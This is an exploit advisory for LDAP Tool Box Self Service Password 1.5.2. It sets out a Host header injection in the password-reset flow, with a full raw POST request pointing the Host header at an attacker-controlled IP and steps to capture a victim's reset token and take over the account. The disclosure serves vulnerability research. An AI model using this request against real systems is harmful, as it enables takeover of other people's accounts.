Headline
LDAP Tool Box Self Service Password 1.5.2 Account Takeover
LDAP Tool Box Self Service Password version 1.5.2 suffers from an account takeover vulnerability.
# Exploit Title: LDAP Tool Box Self Service Password v1.5.2 - Account takeover# Date: 02/17/2023# Exploit Author: Tahar BENNACEF (aka tar.gz)# Software Link: https://github.com/ltb-project/self-service-password# Version: 1.5.2# Tested on: UbuntuSelf Service Password is a PHP application that allows users to changetheir password in an LDAP directory.It is very useful to get back an account with waiting an action from anadministration especially in Active Directory environmentThe password reset feature is prone to an HTTP Host header vulnerabilityallowing an attacker to tamper the password-reset mail sent to his victimallowing him to potentially steal his victim's valid reset token. Theattacker can then use it to perform account takeover*Step to reproduce*1. Request a password reset request targeting your victim and setting inthe request HTTP Host header the value of a server under your controlPOST /?action=sendtoken HTTP/1.1Host: *111.111.111.111*User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 16Origin: https://portal-lab.ngp.infraReferer: https://portal-lab.ngp.infra/?action=sendtokenUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closelogin=test.resetAs the vulnerable web application's relying on the Host header of thepassword-reset request to craft the password-reset mail. The victimreceive a mail with a tampered link[image: image.png]2. Start a webserver and wait for the victim to click on the linkIf the victim click on this tampered link, he will sent his password resettoken to the server set in the password-reset request's HTTP Host header[image: image.png]3. Use the stolen token to reset victim's account passwordBest regards